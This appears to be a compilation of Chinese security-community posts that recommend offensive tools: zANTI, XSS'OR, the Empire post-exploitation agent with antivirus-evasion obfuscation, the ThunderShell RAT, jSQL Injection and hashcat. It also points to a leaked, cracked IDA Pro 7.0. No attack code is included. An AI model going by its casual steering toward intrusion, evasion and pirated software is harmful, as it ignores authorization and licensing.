'Strict-Transport-Security': 'alert',
'Public-Key-Pins': 'none',
'Content-Security-Policy': 'warning',
'X-Permitted-Cross-Domain-Policies': 'warning',
'Referrer-Policy': 'warning'
}
如果对 Python 及 HTTP 协议感兴趣的,可以读一遍这段代码。遇到不懂的百度/Google 就好,比如上面那些安全头分别是用来干什么的。
然后可以思考,这个工具还应该完善些什么?
欢迎交流。
...
...
匿名用户 提问: 在有一定硬件支持下,想自己用服务器塔成专门跑密码的,目前只是下载了彩虹表 和其它之类跑简单密码大概1.5T, 请问一下你们在公司肯定也有专门跑密码的方案吧? 比如像 WordPress之类的密码和系统以及无线的密码? 用什么工具以等。 能参考下或者提下意见么?
没,不过你可以试试 hashcat
...
...
#工具#
内网渗透神器 App:zANTI 2.5.0 下载
刚刚看到 zANTI 的这篇文章:
zANTI APK 2.5.0 Download For Android 2017 - Zanti ...
介绍了 2.5.0 的下载,特性如下:
- Hijack HTTP session.
- Audit passwords.
- MIMT(Man in the middle attack)
- Network scanning.
- Capture downloads.
- Exploit routers.
- MAC address spoofing.
- Create a fake wifi hotspot.
- Modify HTTP request.
我玩黑手(黑客手机)必定会安装 zANTI,这在做内网的渗透,尤其是自动主机及端口扫描,爆破,一些漏洞利用,路由器攻击,中间人劫持,Wi-Fi 伪造等方面,非常方便。
如果你有安卓手机,可以安装一个体验体验,需要 root。
...
移动渗透测试平台搭建 – NetHunter 3.0 - FreeBuf.COM | 关注黑客与极客
...
XSS'OR - Hack with JavaScript 开源!
采用 BSD 开源协议,很宽松,不限制传播与商业化,留下作者版权就好。
GitHub - evilcos/xssor2: XSS'OR - Hack with JavaSc...
简单说明下:
上线之后(xssor.io),使用频率还不错。源码是 Python 及 JavaScript,采用了 Django、Bootstrap、jQuery 三个优秀框架,可以完整覆盖前后端,基于这三个框架,开发速度非常的快,整个过程消耗我不到一周时间,其中一半耗时在软件设计上。感兴趣这个过程的,可以读这套源码,很简洁,在开发过程中我特意去掉数据库(因为我觉得我这个应用场景其实不需要数据库)。
既然开源了,后续应该会和新组建的 ATToT 安全团队一起去完善它。
有任何问题,欢迎联系我。
...
#工具#
XSS'OR 今天更新了,很强大,如果会玩的话。
更新了两个小地方:
Probe 探针支持 file:// 协议了; Probe 探针的状态做了优化;
在线体验:xssor.io 开源地址:
GitHub - evilcos/xssor2: XSS'OR - Hack with JavaScript.
for some reason,少年,抽个SSR吧
shadowsocks-rss/readme.md at master · breakwa11/sh...
...
...
匿名用户 提问: cos大大新手求指导cSploit的大部分功能能够用kali自带的工具复现不?能不能举个栗子,实在不熟kali的工具哇
可以,了解好 ethercap、arpspoof 等命令,你读读 cSploit 源码,就会发现它底层也是基于这些命令。还可以进一步了解 bettercap、responder 这些。
至于每个命令工具怎么用,网上教程多,自己摸索也行。
#tools#
ThunderShell基于PowerShell的RAT,使用HTTP进行通信。网络流量使用RC4进行加密
https://github.com/Mr-Un1k0d3r/ThunderShell
...
...
#工具#
Empire 更新了 v2.1
Empire is a PowerShell and Python post-exploitation agent.
这款 PowerShell 与 Python 攻击利用神器,想必越来越多渗透师在用。时隔3个多月,更新了不少内容。具体的可以看这:
Empire/changelog at master · EmpireProject/Empire ...
我最感兴趣的更新内容是下面这条:
-Add Obfuscated Empire #597 @cobbr
增加了混淆 Empire,这个我们第一时间就跟进研究并运用了,Empire 也真的整合了,不过我还没测试整合得如何。
基于 Python 构建的 Empire 开源生态非常有前途(远不仅是 Empire 本身),由于这种生态在 GitHub 这种高浓度黑客氛围下发展着,渗透师的距离也越来越小了。和我交流过的人会明白此时的竞争壁垒在哪,加油吧。
如果你听都没听说过这个,或没实战运用过,自己查资料吧。
...
...
#工具#
渗透利用神器 Empire 2.2 发布及一点看法
Empire 2.2 – Maintaining an Empire – rvrsh3ll’s Bl...
优化了一些问题及增加了一些特性,英文很简单自己看吧。还可以搜搜本圈,之前也发过历史相关。这些 Red Team 牛人在加速 Empire 发展,下一版本说是直接跳到 3.0。
特别说下,Empire 估计不会特别去发展混淆 Empire 技术,他们觉得和杀软们玩打地鼠游戏没意思。其实这个我赞同,文件静态免杀应该自己来,脚本混淆多简单的事。Empire 在渗透其他方面如绕过、伪装、隐藏一直在提升,不过对抗是动态的,不断进化是必然的。
Empire 确实是很优秀的渗透利用框架(其实就是个远控)。Empire 生态能发展还有个重要特性:
REST API。
#工具#
Empire 2.3 发布
Empire/changelog at master · EmpireProject/Empire ...
就是做了不少 fix,主要功能变化还是要等 3.0 这个大版本。嗯,之前说过。
CptJesus | SharpHound: Evolution of the BloodHound...
GitHub - BloodHoundAD/SharpHound: The BloodHound C...
BloodHound团队这两天用c#重写了BloodHound的扫描端,解决不少线程性能问题,还加入了缓存机制,对大型域网络更容易进行扫描了。
...
...
#资源#
Ida Pro 7.0 + All Decompilers Full Leak-Pass
Ida Pro 7.0 All Decompilers Full Leak-Pass - 『逆向...
[Из привата] [LEAKED] IDA Pro 7.0 HexRays 2 (ARM...
应该都有了吧?应该不会在私人电脑里直接用吧?
6.8 已经是逆向常用神器,7.0 继续。
...
...
#姿势#
Ubuntu 上安装 IDA Pro 7.0
注:破解版可以搜本圈关键词:IDA,先下载好。
最近更新了常用 Ubuntu 到 16.04 64 位,桌面版的,之前的逆向环境也顺便做了个升级,这里把安装 IDA Pro 7.0 的经验给大家简单分享下。
Ubuntu 初始化的源可以使用 aliyun 的,国内更新快。
第一个坑是 Wine 的版本问题。
默认情况下,apt-get 里安装的是 1.6 系列的,这个系列实测对 IDA Pro 7.0 兼容性不行,那么只能乖乖按照官方指南走:
安装后,右键 IDA Pro 的 exe 文件,选择 Wine 打开安装。
第二个坑是 Python 2.7 64 位安装不上。
可以先忽略完成 IDA Pro 的安装后,再单独安装:
下载 Python 2.7 的 MSI 文件,命令行下执行:
wine64 msiexec /i python-2.7.14.amd64.msi
即可顺利完成安装,注意这里执行的是 wine64 命令,就这点小差异:)
当然,如果第一步用 wine64 去安装 IDA Pro,那应该可以很顺利,懒得试。
总结下解决问题的思路:
- 遇到莫名其妙的问题,可以开调试大法,比如 strace/ltrace/pdb 这些命令
- 还可以看命令输出及相关日志
- Google 之
- 官方文档是最保险的一招
- 一些基本知识是需要有的,如 32/64 位的区别
#工具#
jSQL Injection 注入神器
在 Kali Linux、Pentest Box,、Parrot Security OS、ArchStrike/BlackArch Linux 等都有集成。
支持注入的数据库如下:
Access, CockroachDB, CUBRID, DB2, Derby, Firebird, H2, Hana, HSQLDB, Informix, Ingres, MaxDB, Mckoi, MySQL, Neo4j, NuoDB, Oracle, PostgreSQL, SQLite, SQL Server, Sybase, Teradata and Vertica,居然有 Neo4j。
还可以轻松对 SOAP、JSON 等数据格式进行注入。
这个神器是免费开源且跨平台的,还自带中文显示!具体见:
GitHub - ron190/jsql-injection: jSQL Injection is ...
有趣实用的杂项分享
You-Get 一款实用的网站视频下载工具(谁用谁知道)
安装:pip3 install you-get
用法:you-get 视频播放页面的url
官方站: You-Get
github: GitHub - soimort/you-get: Dumb downloader that scr...
支持以下网站的视频/音频下载:
#资源#
Windows 10 开发环境虚拟机
Download a Windows 10 virtual machine - Windows ap...
包括:
Windows 10 Fall Creators Update Enterprise Evaluation
Visual Studio 2017 (Build 15.4) with the UWP, desktop C++, and Azure workflows enabled
Windows developer SDK and tools (Build 16299.15, installed as part of VS UWP workflow)
Windows UWP samples (Latest)
Windows Subsystem for Linux enabled
Developer mode, Bash on Ubuntu on Windows, and containers enabled
官方提供的,有钱的懒人必备。
